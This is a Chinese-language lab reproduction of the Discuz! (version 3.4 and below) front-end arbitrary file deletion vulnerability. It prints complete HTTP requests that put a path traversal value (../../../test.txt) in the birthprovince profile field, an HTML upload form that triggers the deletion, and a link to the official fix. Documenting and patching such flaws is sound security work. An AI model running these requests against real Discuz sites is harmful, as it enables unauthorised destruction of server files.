前言:
9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
影响版本:
Discuz < =3.4
复现过程:
首先在discuz目录下新建一个test.txt文件,到时候删除用。
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。
利用burp抓包,获取cookie
发送下面数据包:修改cookie,formhash,还有删除的文件
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
刷新页面,查看出生地就会显示成下图所示的状态:
说明数据已经进入数据库:
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
<input type="file"name="birthprovince" id="file" />
<input type="text"name="formhash" value="84a7f376"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</from>
或者直接构建数据包:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1
-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg
zerba(这里写啥都可以)
-----------------------------123821742118716--
进去discuz看看,可以看到,test.txt文件已经被删除了。
修复建议:
https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
参考链接:
